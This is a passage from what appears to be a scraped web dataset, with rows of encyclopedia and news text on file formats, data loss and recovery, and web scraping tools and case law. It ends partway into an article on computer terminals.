and the VSAM Volume Record in the VSAM Volume Data Set (VVDS) (with ICF catalogs) identifies the type of VSAM dataset. In IBM OS 360 through z OS, a format 1 or 7 Data Set Control Block (DSCB) in the Volume Table of Contents (VTOC) identifies the Dataset Organization (DSORG) of the dataset described by it. The HPFS, FAT12, and FAT16 (but not FAT32) filesystems allow the storage of "extended attributes" with files. These comprise an arbitrary set of triplets with a name, a coded type for the value, and a value, where the names are unique and values can be up to 64 KB long. There are standardized meanings for certain types and names (under OS 2). One such is that the .TYPE" extended attribute is used to determine the file type. Its value comprises a list of one or more file types associated with the file, each of which is a string, such as "Plain Text" or "HTML document". Thus a file may have several types. The NTFS filesystem also allows storage of OS 2 extended attributes, as one of the file forks, but this feature is merely present to support the OS 2 subsystem (not present in XP), so the Win32 subsystem treats this information as an opaque block of data and does not use it. Instead, it relies on other file forks to store meta-information in Win32 specific formats. OS 2 extended attributes can still be read and written by Win32 programs, but the data must be entirely parsed by applications. On Unix and Unix-like systems, the ext2, ext3, ext4, ReiserFS version 3, XFS, JFS, FFS, and HFS filesystems allow the storage of extended attributes with files. These include an arbitrary list of "name value" strings, where the names are unique and a value can be accessed through its related name. The PRONOM Persistent Unique Identifier (PUID) is an extensible scheme of persistent, unique, and unambiguous identifiers for file formats, which has been developed by The National Archives of the UK as part of its PRONOM technical registry service. PUIDs can be expressed as Uniform Resource Identifiers using the info:pronom namespace. Although not yet widely used outside of the UK government and some digital preservation programs, the PUID scheme does provide greater granularity than most alternative schemes. MIME types are widely used in many Internet-related applications, and increasingly elsewhere, although their usage for on-disc type information is rare. These consist of a standardised system of identifiers (managed by IANA) consisting of a type and a sub-type, separated by a slash—for instance, text html or image gif. These were originally intended as a way of identifying what type of file was attached to an e-mail, independent of the source and target operating systems. MIME types identify files on BeOS, AmigaOS 4.0 and MorphOS, as well as store unique application signatures for application launching. In AmigaOS and MorphOS, the Mime type system works in parallel with Amiga specific Datatype system. There are problems with the MIME types though; several organizations and people have created their own MIME types without registering them properly with IANA, which makes the use of this standard awkward in some cases. File format identifiers are another, not widely used way to identify file formats according to their origin and their file category. It was created for the Description Explorer suite of software. It is composed of several digits of the form NNNNNNNNN-XX-YYYYYYY. The first part indicates the organization origin maintainer (this number represents a value in a company standards organization database), and the 2 following digits categorize the type of file in hexadecimal. The final part is composed of the usual filename extension of the file or the international standard number of the file, padded left with zeros. For example, the PNG file specification has the FFID of 000000001 31 0015948 where 31 indicates an image file, 0015948 is the standard number and 000000001 indicates the International Organization for Standardization (ISO). Another less popular way to identify the file format is to examine the file contents for distinguishable patterns among file types. The contents of a file are a sequence of bytes and a byte has 256 unique permutations (0 255). Thus, counting the occurrence of byte patterns that is often referred to as byte frequency distribution gives distinguishable patterns to identify file types. There are many content-based file type identification schemes that use a byte frequency distribution to build the representative models for file type and use any statistical and data mining techniques to identify file types. 2 There are several types of ways to structure data in a file. The most usual ones are described below. Earlier file formats used raw data formats that consisted of directly dumping the memory images of one or more structures into the file. This has several drawbacks. Unless the memory images also have reserved spaces for future extensions, extending and improving this type of structured file is very difficult. It also creates files that might be specific to one platform or programming language (for example a structure containing a Pascal string is not recognized as such in C). On the other hand, developing tools for reading and writing these types of files is very simple. The limitations of the unstructured formats led to the development of other types of file formats that could be easily extended and be backward compatible at the same time. In this kind of file structure, each piece of data is embedded in a container that somehow identifies the data. The container's scope can be identified by start- and end-markers of some kind, by an explicit length field somewhere, or by fixed requirements of the file format's definition. Throughout the 1970s, many programs used formats of this general kind. For example, word-processors such as troff, Script, and Scribe, and database export files such as CSV. Electronic Arts and Commodore-Amiga also used this type of file format in 1985, with their IFF (Interchange File Format) file format. A container is sometimes called a "chunk", although "chunk" may also imply that each piece is small, and or that chunks do not contain other chunks; many formats do not impose those requirements. The information that identifies a particular "chunk" may be called many different things, often terms including "field name", "identifier", "label", or "tag". The identifiers are often human-readable, and classify parts of the data: for example, as a "surname", "address", "rectangle", "font name", etc. These are not the same thing as identifiers in the sense of a database key or serial number (although an identifier may well identify its associated data as such a key). With this type of file structure, tools that do not know certain chunk identifiers simply skip those that they do not understand. Depending on the actual meaning of the skipped data, this may or may not be useful (CSS explicitly defines such behavior). This concept has been used again and again by RIFF (Microsoft-IBM equivalent of IFF), PNG, JPEG storage, DER (Distinguished Encoding Rules) encoded streams and files (which were originally described in CCITT X.409:1984 and therefore predate IFF), and Structured Data Exchange Format (SDXF). Indeed, any data format must somehow identify the significance of its component parts, and embedded boundary-markers are an obvious way to do so: This is another extensible format, that closely resembles a file system (OLE Documents are actual filesystems), where the file is composed of 'directory entries' that contain the location of the data within the file itself as well as its signatures (and in certain cases its type). Good examples of these types of file structures are disk images, executables, OLE documents TIFF, libraries. Some file formats like ODT and DOCX, being PKZIP-based, are both chunked and carry a directory. citation needed The structure of a directory-based file format lends itself to modifications more easily than unstructured or chunk-based formats. citation needed The nature of this type of format allows users to carefully construct files that causes reader software to do things the authors of the format never intended to happen. An example of this is the zip bomb. Directory-based file formats also use values that point at other areas in the file but if some later data value points back at data that was read earlier, it can result in an infinite loop for any reader software that assumes the input file is valid and blindly follows the loop. citation needed |
559 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Data_loss | Data loss is an error condition in information systems in which information is destroyed by failures (like failed spindle motors or head crashes on hard drives) or neglect (like mishandling, careless handling or storage under unsuitable conditions) in storage, transmission, or processing. Information systems implement backup and disaster recovery equipment and processes to prevent data loss or restore lost data. 1 Data loss can also occur if the physical medium containing the data is lost or stolen. Data loss is distinguished from data unavailability, which may arise from a network outage. Although the two have substantially similar consequences for users, data unavailability is temporary, while data loss may be permanent. Data loss is also distinct from data breach, an incident where data falls into the wrong hands, although the term data loss has been used in those incidents. 2 Studies show hardware failure and human error are the two most common causes of data loss, accounting for roughly three quarters of all incidents. 3 Another cause of data loss is a natural disaster, which is a greater risk dependent on where the hardware is located. While the probability of data loss due to natural disaster is small, the only way to prepare for such an event is to store backup data in a separate physical location. As such, the best backup plans always include at least one copy being stored off-site. 4 The cost of a data loss event is directly related to the value of the data and the length of time that it is unavailable yet needed. For an enterprise in particular, the definition of cost extends beyond the financial and can also include time. Consider: The frequency of data loss and the impact can be greatly mitigated by taking proper precautions, those of which necessary can vary depending on the type of data loss. For example, multiple power circuits with battery backup and a generator only protect against power failures, though using an Uninterruptible Power Supply can protect drive against sudden power spikes. Similarly, using a journaling file system and RAID storage only protect against certain types of software and hardware failure. 5 For hard disk drives, which are a physical storage medium, ensuring minimal vibration and movement will help protect against damaging the components internally, as can maintaining a suitable drive temperature. 6 Regular data backups are an important asset to have when trying to recover after a data loss event, but they do not prevent user errors or system failures. As such, a data backup plan needs to be established and run in unison with a disaster recovery plan in order to lower risk. 7 Data recovery is often performed by specialized commercial services that have developed often proprietary methods to recover data from physically damaged media. Service costs at data recovery labs are usually dependent on type of damage and type of storage medium, as well as the required security or cleanroom procedures. File system corruption can frequently be repaired by the user or the system administrator. For example, a deleted file is typically not immediately overwritten on disk, but more often simply has its entry deleted from the file system index. In such a case, the deletion can be easily reversed. Successful recovery from data loss generally requires implementation of an effective backup strategy. Without an implemented backup strategy, recovery requires reinstallation of programs and regeneration of data. Even with an effective backup strategy, restoring a system to the precise state it was in prior to the Data Loss Event is extremely difficult. Some level of compromise between granularity of recoverability and cost is necessary. Furthermore, a Data Loss Event may not be immediately apparent. An effective backup strategy must also consider the cost of maintaining the ability to recover lost data for long periods of time. A highly effective backup system would have duplicate copies of every file and program that were immediately accessible whenever a Data Loss Event was noticed. However, in most situations, there is an inverse correlation between the value of a unit of data and the length of time it takes to notice the loss of that data. Taking this into consideration, many backup strategies decrease the granularity of restorability as the time increases since the potential Data Loss Event. By this logic, recovery from recent Data Loss Events is easier and more complete than recovery from Data Loss Events that happened further in the past. Recovery is also related to the type of Data Loss Event. Recovering a single lost file is substantially different from recovering an entire system that was destroyed in a disaster. An effective backup regimen has some proportionality between the magnitude of Data Loss and the magnitude of effort required to recover. For example, it should be far easier to restore the single lost file than to recover the entire system. If data loss occurs, a successful recovery must ensure that the deleted data is not over-written. For this reason write operations to the affected storage device should be avoided. This includes not starting the system to which the affected device is connected. This is because many operating systems create temporary files in order to boot, and these may overwrite areas of lost data — rendering it unrecoverable. Viewing web pages has the same effect — potentially overwriting lost files with the temporary HTML and image files created when viewing a web page. File operations such as copying, editing, or deleting should also be avoided. Upon realizing data loss has occurred, it is often best to shut down the computer and remove the drive in question from the unit. Re-attach this drive to a secondary computer with a write blocker device and then attempt to recover lost data. If possible, create an image of the drive in order to establish a secondary copy of the data. This can then be tested on, with recovery attempted, abolishing the risk of harming the source data. citation needed |
560 | https://en.wikipedia.org/wiki/Web_scraping | https://www.eff.org/cases/facebook-v-power-ventures | EFF has urged a San Francisco federal court and the Ninth Circuit Court of Appeals to dismiss Facebook's claims that criminal law is violated when its users opt for an add-on service that helps them aggregate their information from a variety of social networking sites. Power Ventures was a company that allowed users to login and manage all of their social networking accounts from one place. In 2008 Facebook sued the company, alleging it had violated the Computer Fraud and Abuse Act (CFAA) and the California state CFAA equivalent when it allowed users to access Facebook data after it blocked a specific IP address Power was using to connect to Facebook data. Facebook also claims that Power violated the CAN-SPAM Act, the federal law that prohibits sending commercial emails with materially misleading information, when Power encouraged users to invite their friends to try Power through Facebook's Events feature because the header information indicated the messages came from Facebook, not Power. In February 2012, the district court found Power liable under both claims and in September 2013, Power was ordered to pay more than $3 million in damages to Facebook. The case is now pending before the Ninth Circuit. EFF has argued that Facebook's interpretations of the law are dangerous to follow-on innovators and consumers and would criminalize widely accepted Internet behavior. Facebook claims that their role as guardian of users’ privacy gives them the power to shut down apps that give users more control over their own social media experience. Facebook is wrong. The latest example is their legal bullying of Friendly Social Browser.Friendly is a web browser with plugins geared... There’s a lot of legitimate concern these days about Internet giants and the lack of competition in the technology sector. It’s still easy and cheap to put up a website, build an app, or organize a group of people online, but a few large corporations have outsized power over the... Social media has a competition problem, and its name is Facebook. Today, Facebook and its subsidiaries are over ten times more valuable than the next two largest social media companies outside China—Twitter and Snapchat—combined. It has cemented its dominance by buying out potential competitors before they’ve had a chance to... For tech lawyers, one of the hottest questions this year is: can companies use the Computer Fraud and Abuse Act (CFAA)—an imprecise and outdated criminal anti “hacking” statute intended to target computer break-ins—to block their competitors from accessing publicly available information on their websites? The answer to this question has wide-ranging... Last weekend’s Cambridge Analytica news—that the company was able to access tens of millions of users’ data by paying low-wage workers on Amazon’s Mechanical Turk to take a Facebook survey, which gave Cambridge Analytica access to Facebook’s dossier on each of those turkers’ Facebook friends—has hammered home two problems: first,... Back to top Check out our 4 star rating on Charity Navigator. |
561 | https://en.wikipedia.org/wiki/Data_scraping | https://web.archive.org/web/20150511050542/http://www.wired.com/2014/03/kimono | Yes, the Apple Watch scratches all stainless steel watches do wrd.cm 1GUkGvK The number of web pages on the internet is somewhere north of two billion, perhaps as many as double that. It’s a huge amount of raw information. By comparison, there are only roughly 10,000 web APIs the virtual pipelines that let developers access, process, and repackage that data. In other words, to do anything new with the vast majority of the stuff on the web, you need to scrape it yourself. Even for the people who know how to do that, it’s tedious. Ryan Rowe and Pratap Ranade want to change that. For the last five months, Rowe and Ranade have been building out Kimono, a web app that lets you slurp data from any website and turn it instantly into an API. Using a bookmarklet, you highlight the parts of a site you want to scrape and Kimono does the rest. Those with programming chops can take the code Kimono spits out bake it into their own apps; for the code illiterate, Kimono will automatically rework scraped data into a dynamic chart, list, or a simple web app. In essence, it’s a point and click toolkit for taking apart the web, with the aim of letting people build new things with it. Excitement’s already bubbling around the potential. Kimono’s already raised money from big-name VCs like Ron Conway and its founders have had to turn down at least one offer for an early buy-out. The site’s already managing some 15,000 users and it’s still in beta. But for Rowe and Ranade, things are just getting started. The idea for Kimono was born out of Rowe’s time as a developer at the design consultancy Frog, where he continually ran into the same frustrating problem. A designer would have an idea that revolved around web stuff of one sort or another, but they’d have to find a developer before they could even get a sense of how the idea might actually work. “Getting the data just to prove if these apps would be interesting or not took a huge amount of time, which sucked, Rowe says. “You have these situations where designers and analysts really want to do stuff with data but have no means to get it, adds Ranade, whose most recent gig was at consulting firm McKinsey Company. “We realized that there doesn’t need to be that bottleneck. To laypeople who don’t already think of the web in terms of streams, sources, or APIs, it can be hard to grasp Kimono’s potential. But early adopters are already using it for a striking variety of projects. When they noticed there was no official API for the recent Sochi Olympics, Rowe and Ranade used Kimono to create one themselves. Devs and designers took it from there, building elegant medal-tracking apps, dynamic maps that visualize when and where Olympians were born, and more. Around the time the Kimono beta went live last month, Golan Levin, a pioneer of computational art and design, was introducing his students at Carnegie Mellon to the unglamorous first steps of any data viz project: acquiring, parsing, and cleaning data. He thought it’d be valuable to acquaint them with the process. While new tools like Temboo are making it easier than ever to work with official APIs for big-name sites, there traditionally haven’t been straightforward ways to get structured data off the majority of pages on the web. “Kimono came along and really changed that, Levin says. Levin himself is using Kimono to track real estate purchases in his home town of Pittsburgh. He also cited an upcoming meeting of civic-minded coders called the Pittsburgh Data Brigade, where he expected Kimono to see some use. “Pittsburgh’s information systems are so old and creaky that getting data out is really hard, he explains. It’s a problem many municipalities face; they’re eager to open up their data but lack the means to actually open it up. Kimono could help bridge that gap. Democratizing Data Scraping These use cases might sound esoteric, and in some senses, they are. But part of the ambition with Kimono is bringing data scraping to a wider audience. It’s about letting artists, historians, sociologists and more cull and combine content from various sources and present it in novel ways. As an example, Ranade brings up Malcolm Gladwell’s theory about elite hockey players and how their success might be explained by where their birthdays fall in relation to Canada’s little league cutoff dates. A successful author like Gladwell can presumably tap a research assistant to trawl Wikipedia and collect the relevant data. A grad student probably cannot. With Kimono, however, she could amass a list of Wikipedia URLs, point Kimono to the “date of birth” and “place of birth” fields, and let it corral the data for her. This sort of birthday little league cutoff connection isn’t going to be made by a random developer, Ranade posts, but rather by a person who has “domain knowledge” in that field. “They might not be a programmer, he says. “But if we gave a little bit of programming capability to that person, how could they look at the world in a different way? Looking at the World in a Different Way In the short term, Rowe and Ranade plan to make money by charging users depending on how many APIs they use and how frequently they update (right now the service is in beta, and anyone can make however many APIs they want). They’ve already heard interest from a number of corporate clients, who see Kimono as a means to free the flow of data between departments and project teams without relying on an internal IT team to act as translator in-between. But the duo is already thinking even bigger picture. To them, Kimono’s greatest potential comes out as we move from today’s mobile phones and their attendant apps to the next generation of wearable devices and the internet of things. Kimono’s greatest potential comes out as we move to the next generation of wearables. “Smartphones are only a transitional point, Rowe says. “From there we go to smartwatches and Google Glass and other ways of interacting with data around you that don’t involve a screen. And to get from there to there to there you need to package up web data and make it consumable in all these different contexts. We’re trying to position Kimono to be the framework for that conversion. “When the killer apps finally start coming out for things like smartwatches and glasses, they’re not going to be made by the companies that have the most interesting data, he continues. “They’re going to come from the developers and designers who are thinking about it a little bit differently. If we suspend our doubts for a moment and peer into this crystal ball, Kimono starts to look like something very big indeed. In the scenario Rowe lays out, it takes root as a sort of connective tissue for an entirely new class of interactions and experiences something like a nervous system for the internet of things. You could imagine pointing Kimono at not just websites but other sorts of streams, making objects react to sound, say, or building applications that respond to live video feeds. At that point, you’re well beyond the esoteric realm of web scraping. “The ability to turn a website into an API is a very powerful thing, Rowe says. “Being able to turn anything into an API is epically powerful. Go Back to Top. Skip To: Start of Article. These use cases might sound esoteric, and in some senses, they are. But part of the ambition with Kimono is bringing data scraping to a wider audience. It’s about letting artists, historians, sociologists and more cull and combine content from various sources and present it in novel ways. As an example, Ranade brings up Malcolm Gladwell’s theory about elite hockey players and how their success might be explained by where their birthdays fall in relation to Canada’s little league cutoff dates. A successful author like Gladwell can presumably tap a research assistant to trawl Wikipedia and collect the relevant data. A grad student probably cannot. With Kimono, however, she could amass a list of Wikipedia URLs, point Kimono to the “date of birth” and “place of birth” fields, and let it corral the data for her. This sort of birthday little league cutoff connection isn’t going to be made by a random developer, Ranade posts, but rather by a person who has “domain knowledge” in that field. “They might not be a programmer, he says. “But if we gave a little bit of programming capability to that person, how could they look at the world in a different way? In the short term, Rowe and Ranade plan to make money by charging users depending on how many APIs they use and how frequently they update (right now the service is in beta, and anyone can make however many APIs they want). They’ve already heard interest from a number of corporate clients, who see Kimono as a means to free the flow of data between departments and project teams without relying on an internal IT team to act as translator in-between. But the duo is already thinking even bigger picture. To them, Kimono’s greatest potential comes out as we move from today’s mobile phones and their attendant apps to the next generation of wearable devices and the internet of things. “Smartphones are only a transitional point, Rowe says. “From there we go to smartwatches and Google Glass and other ways of interacting with data around you that don’t involve a screen. And to get from there to there to there you need to package up web data and make it consumable in all these different contexts. We’re trying to position Kimono to be the framework for that conversion. “When the killer apps finally start coming out for things like smartwatches and glasses, they’re not going to be made by the companies that have the most interesting data, he continues. “They’re going to come from the developers and designers who are thinking about it a little bit differently. If we suspend our doubts for a moment and peer into this crystal ball, Kimono starts to look like something very big indeed. In the scenario Rowe lays out, it takes root as a sort of connective tissue for an entirely new class of interactions and experiences something like a nervous system for the internet of things. You could imagine pointing Kimono at not just websites but other sorts of streams, making objects react to sound, say, or building applications that respond to live video feeds. At that point, you’re well beyond the esoteric realm of web scraping. “The ability to turn a website into an API is a very powerful thing, Rowe says. “Being able to turn anything into an API is epically powerful. Yes, the Apple Watch scratches all stainless steel watches do wrd.cm 1GUkGvK Yes, the Apple Watch scratches all stainless steel watches do wrd.cm 1GUkGvK Use of this site constitutes acceptance of our user agreement (effective 3 21 12) and privacy policy (effective 3 21 12). Your California privacy rights. The material on this site may not be reproduced, distributed, transmitted, cached or otherwise used, except with the prior written permission of Cond Nast. |
562 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Web_scraping#cite_ref-10 | Web scraping, web harvesting, or web data extraction is data scraping used for extracting data from websites. 1 Web scraping software may directly access the World Wide Web using the Hypertext Transfer Protocol or a web browser. While web scraping can be done manually by a software user, the term typically refers to automated processes implemented using a bot or web crawler. It is a form of copying in which specific data is gathered and copied from the web, typically into a central local database or spreadsheet, for later retrieval or analysis. Scraping a web page involves fetching it and extracting from it. Fetching is the downloading of a page (which a browser does when a user views a page). Therefore, web crawling is a main component of web scraping, to fetch pages for later processing. Once fetched, extraction can take place. The content of a page may be parsed, searched and reformatted, and its data copied into a spreadsheet or loaded into a database. Web scrapers typically take something out of a page, to make use of it for another purpose somewhere else. An example would be finding and copying names and telephone numbers, companies and their URLs, or e-mail addresses to a list (contact scraping). As well as contact scraping, web scraping is used as a component of applications used for web indexing, web mining and data mining, online price change monitoring and price comparison, product review scraping (to watch the competition), gathering real estate listings, weather data monitoring, website change detection, research, tracking online presence and reputation, web mashup, and web data integration. Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. As a result, specialized tools and software have been developed to facilitate the scraping of web pages. Web scraping applications include market research, price comparison, content monitoring, and more. Businesses rely on web scraping services to efficiently gather and utilize this data. Newer forms of web scraping involve monitoring data feeds from web servers. For example, JSON is commonly used as a transport mechanism between the client and the web server. There are methods that some websites use to prevent web scraping, such as detecting and disallowing bots from crawling (viewing) their pages. In response, there are web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate human browsing to enable gathering web page content for offline parsing Web scraping is the process of automatically mining data or collecting information from the World Wide Web. It is a field with active developments sharing a common goal with the semantic web vision, an ambitious initiative that still requires breakthroughs in text processing, semantic understanding, artificial intelligence and human-computer interactions. The simplest form of web scraping is manually copying and pasting data from a web page into a text file or spreadsheet. Sometimes even the best web-scraping technology cannot replace a human's manual examination and copy-and-paste, and sometimes this may be the only workable solution when the websites for scraping explicitly set up barriers to prevent machine automation. A simple yet powerful approach to extract information from web pages can be based on the UNIX grep command or regular expression-matching facilities of programming languages (for instance Perl or Python). Static and dynamic web pages can be retrieved by posting HTTP requests to the remote web server using socket programming. Many websites have large collections of pages generated dynamically from an underlying structured source like a database. Data of the same category are typically encoded into similar pages by a common script or template. In data mining, a program that detects such templates in a particular information source, extracts its content, and translates it into a relational form, is called a wrapper. Wrapper generation algorithms assume that input pages of a wrapper induction system conform to a common template and that they can be easily identified in terms of a URL common scheme. 3 Moreover, some semi-structured data query languages, such as XQuery and the HTQL, can be used to parse HTML pages and to retrieve and transform page content. By embedding a full-fledged web browser, such as the Internet Explorer or the Mozilla browser control, programs can retrieve the dynamic content generated by client-side scripts. These browser controls also parse web pages into a DOM tree, based on which programs can retrieve parts of the pages. Languages such as Xpath can be used to parse the resulting DOM tree. There are several companies that have developed vertical specific harvesting platforms. These platforms create and monitor a multitude of "bots" for specific verticals with no "man in the loop" (no direct human involvement), and no work related to a specific target site. The preparation involves establishing the knowledge base for the entire vertical and then the platform creates the bots automatically. The platform's robustness is measured by the quality of the information it retrieves (usually number of fields) and its scalability (how quick it can scale up to hundreds or thousands of sites). This scalability is mostly used to target the Long Tail of sites that common aggregators find complicated or too labor-intensive to harvest content from. The pages being scraped may embrace metadata or semantic markups and annotations, which can be used to locate specific data snippets. If the annotations are embedded in the pages, as Microformat does, this technique can be viewed as a special case of DOM parsing. In another case, the annotations, organized into a semantic layer, 4 are stored and managed separately from the web pages, so the scrapers can retrieve data schema and instructions from this layer before scraping the pages. There are efforts using machine learning and computer vision that attempt to identify and extract information from web pages by interpreting pages visually as a human being might. 5 Uses advanced AI to interpret and process web page content contextually, extracting relevant information, transforming data, and customizing outputs based on the content's structure and meaning. This method enables more intelligent and flexible data extraction, accommodating complex and dynamic web content. The world of web scraping offers a variety of software tools designed to simplify and customize the process of data extraction from websites. These tools vary in their approach and capabilities, making web scraping accessible to both novice users and advanced programmers. Some advanced web scraping software can automatically recognize the data structure of a web page, eliminating the need for manual coding. Others provide a recording interface that allows users to record their interactions with a website, thus creating a scraping script without writing a single line of code. Many tools also include scripting functions for more customized extraction and transformation of content, along with database interfaces to store the scraped data locally. Web scraping tools are versatile in their functionality. Some can directly extract data from APIs, while others are capable of handling websites with AJAX-based dynamic content loading or login requirements. Point-and-click software, for instance, empowers users without advanced coding skills to benefit from web scraping. This democratizes access to data, making it easier for a broader audience to leverage the power of web scraping. Popular Web Scraping Tools BeautifulSoup: A Python library that provides simple methods for extracting data from HTML and XML files. Scrapy: An open-source and collaborative web crawling framework for Python that allows you to extract the data, process it, and store it. Octoparse: A no-code web scraping tool that offers a user-friendly interface for extracting data from websites without needing programming skills. ParseHub: Another no-code web scraper that can handle dynamic content and works with AJAX-loaded sites. Apify: A platform that offers a wide range of scraping tools and the ability to create custom scrapers. InstantAPI.ai: An AI-powered tool that transforms any web page into personalized APIs instantly, offering advanced data extraction and customization. Some platforms provide not only tools for web scraping but also opportunities for developers to share and potentially monetize their scraping solutions. By leveraging these tools and platforms, users can unlock the full potential of web scraping, turning raw data into valuable insights and opportunities. 6 The legality of web scraping varies across the world. In general, web scraping may be against the terms of service of some websites, but the enforceability of these terms is unclear. 7 In the United States, website owners can use three major legal claims to prevent undesired web scraping: (1) copyright infringement (compilation), (2) violation of the Computer Fraud and Abuse Act ("CFAA"), and (3) trespass to chattel. 8 However, the effectiveness of these claims relies upon meeting various criteria, and the case law is still evolving. For example, with regard to copyright, while outright duplication of original expression will in many cases be illegal, in the United States the courts ruled in Feist Publications v. Rural Telephone Service that duplication of facts is allowable. U.S. courts have acknowledged that users of "scrapers" or "robots" may be held liable for committing trespass to chattels, 9 10 which involves a computer system itself being considered personal property upon which the user of a scraper is trespassing. The best known of these cases, eBay v. Bidder's Edge, resulted in an injunction ordering Bidder's Edge to stop accessing, collecting, and indexing auctions from the eBay web site. This case involved automatic placing of bids, known as auction sniping. However, in order to succeed on a claim of trespass to chattels, the plaintiff must demonstrate that the defendant intentionally and without authorization interfered with the plaintiff's possessory interest in the computer system and that the defendant's unauthorized use caused damage to the plaintiff. Not all cases of web spidering brought before the courts have been considered trespass to chattels. 11 One of the first major tests of screen scraping involved American Airlines (AA), and a firm called FareChase. 12 AA successfully obtained an injunction from a Texas trial court, stopping FareChase from selling software that enables users to compare online fares if the software also searches AA's website. The airline argued that FareChase's websearch software trespassed on AA's servers when it collected the publicly available data. FareChase filed an appeal in March 2003. By June, FareChase and AA agreed to settle and the appeal was dropped. 13 Southwest Airlines has also challenged screen-scraping practices, and has involved both FareChase and another firm, Outtask, in a legal claim. Southwest Airlines charged that the screen-scraping is Illegal since it is an example of "Computer Fraud and Abuse" and has led to "Damage and Loss" and "Unauthorized Access" of Southwest's site. It also constitutes "Interference with Business Relations", "Trespass", and "Harmful Access by Computer". They also claimed that screen-scraping constitutes what is legally known as "Misappropriation and Unjust Enrichment", as well as being a breach of the web site's user agreement. Outtask denied all these claims, claiming that the prevailing law, in this case, should be US Copyright law and that under copyright, the pieces of information being scraped would not be subject to copyright protection. Although the cases were never resolved in the Supreme Court of the United States, FareChase was eventually shuttered by parent company Yahoo , and Outtask was purchased by travel expense company Concur. 14 In 2012, a startup called 3Taps scraped classified housing ads from Craigslist. Craigslist sent 3Taps a cease-and-desist letter and blocked their IP addresses and later sued, in Craigslist v. 3Taps. The court held that the cease-and-desist letter and IP blocking was sufficient for Craigslist to properly claim that 3Taps had violated the Computer Fraud and Abuse Act (CFAA). Although these are early scraping decisions, and the theories of liability are not uniform, it is difficult to ignore a pattern emerging that the courts are prepared to protect proprietary content on commercial sites from uses which are undesirable to the owners of such sites. However, the degree of protection for such content is not settled and will depend on the type of access made by the scraper, the amount of information accessed and copied, the degree to which the access adversely affects the site owner's system and the types and manner of prohibitions on such conduct. 15 While the law in this area becomes more settled, entities contemplating using scraping programs to access a public web site should also consider whether such action is authorized by reviewing the terms of use and other terms or notices posted on or made available through the site. In a 2010 ruling in the Cvent, Inc. v. Eventbrite, Inc. In the United States district court for the eastern district of Virginia, the court ruled that the terms of use should be brought to the users' attention In order for a browse wrap contract or license to be enforced. 16 In a 2014 case, filed in the United States District Court for the Eastern District of Pennsylvania, 17 e-commerce site QVC objected to the Pinterest-like shopping aggregator Resultly's 'scraping of QVC's site for real-time pricing data. QVC alleges that Resultly "excessively crawled" QVC's retail site (allegedly sending 200 300 search requests to QVC's website per minute, sometimes to up to 36,000 requests per minute) which caused QVC's site to crash for two days, resulting in lost sales for QVC. 18 QVC's complaint alleges that the defendant disguised its web crawler to mask its source IP address and thus prevented QVC from quickly repairing the problem. This is a particularly interesting scraping case because QVC is seeking damages for the unavailability of their website, which QVC claims was caused by Resultly. In the plaintiff's web site during the period of this trial, the terms of use link are displayed among all the links of the site, at the bottom of the page as most sites on the internet. This ruling contradicts the Irish ruling described below. The court also rejected the plaintiff's argument that the browse-wrap restrictions were enforceable in view of Virginia's adoption of the Uniform Computer Information Transactions Act (UCITA)—a uniform law that many believed was in favor on common browse-wrap contracting practices. 19 In Facebook, Inc. v. Power Ventures, Inc., a district court ruled in 2012 that Power Ventures could not scrape Facebook pages on behalf of a Facebook user. The case is on appeal, and the Electronic Frontier Foundation filed a brief in 2015 asking that it be overturned. 20 21 In Associated Press v. Meltwater U.S. Holdings, Inc., a court in the US held Meltwater liable for scraping and republishing news information from the Associated Press, but a court in the United Kingdom held in favor of Meltwater. The Ninth Circuit ruled in 2019 that web scraping did not violate the CFAA in hiQ Labs v. LinkedIn. The case was appealed to the United States Supreme Court, which returned the case to the Ninth Circuit to reconsider the case in light of the 2021 Supreme Court decision in Van Buren v. United States which narrowed the applicability of the CFAA. 22 On this review, the Ninth Circuit upheld their prior decision. 23 Internet Archive collects and distributes a significant number of publicly available web pages without being considered to be in violation of copyright laws. citation needed In February 2006, the Danish Maritime and Commercial Court (Copenhagen) ruled that systematic crawling, indexing, and deep linking by portal site ofir.dk of real estate site Home.dk does not conflict with Danish law or the database directive of the European Union. 24 In a February 2010 case complicated by matters of jurisdiction, Ireland's High Court delivered a verdict that illustrates the inchoate state of developing case law. In the case of Ryanair Ltd v Billigfluege.de GmbH, Ireland's High Court ruled Ryanair's "click-wrap" agreement to be legally binding. In contrast to the findings of the United States District Court Eastern District of Virginia and those of the Danish Maritime and Commercial Court, Justice Michael Hanna ruled that the hyperlink to Ryanair's terms and conditions was plainly visible, and that placing the onus on the user to agree to terms and conditions in order to gain access to online services is sufficient to comprise a contractual relationship. 25 The decision is under appeal in Ireland's Supreme Court. 26 On April 30, 2020, the French Data Protection Authority (CNIL) released new guidelines on web scraping. 27 The CNIL guidelines made it clear that publicly available data is still personal data and cannot be repurposed without the knowledge of the person to whom that data belongs. 28 In Australia, the Spam Act 2003 outlaws some forms of web harvesting, although this only applies to email addresses. 29 30 Leaving a few cases dealing with IPR infringement, Indian courts have not expressly ruled on the legality of web scraping. However, since all common forms of electronic contracts are enforceable in India, violating the terms of use prohibiting data scraping will be a violation of the contract law. It will also violate the Information Technology Act, 2000, which penalizes unauthorized access to a computer resource or extracting data from a computer resource. The administrator of a website can use various measures to stop or slow a bot. Some techniques include: |
563 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Computer_terminal | A computer terminal is an electronic or electromechanical hardware device that can be used for entering data into, and transcribing 1 data from, a computer or a computing system. 2 Most early computers only had a front panel to input or display bits and had to be connected to a terminal to print or input text through a keyboard. Teleprinters were used as early-day hard-copy terminals 3 4 and predated the use of a computer screen by decades. The computer would typically transmit a line of data which would be printed on paper, and accept a line of data from a keyboard over a serial or other interface. Starting in the mid 1970s with microcomputers such as the Sphere 1, Sol 20, and Apple I, display circuitry and keyboards began to be integrated into personal and workstation computer systems, with the computer handling character generation and outputting to a CRT display such as a computer monitor or, sometimes, a consumer TV, but most larger computers continued to require terminals. Early terminals were inexpensive devices but very slow compared to punched cards or paper tape for input; with the advent of time-sharing systems, terminals slowly pushed these older forms of interaction from the industry. Related development were the improvement of terminal technology and the introduction of inexpensive video displays. Early Teletypes only printed out with a communications speed of only 75 baud or 10 5 bit characters per second, and by the 1970s speeds of video terminals had improved to 2400 or 9600 2400 bit s. Similarly, the speed of remote batch terminals had improved to 4800 bit s at 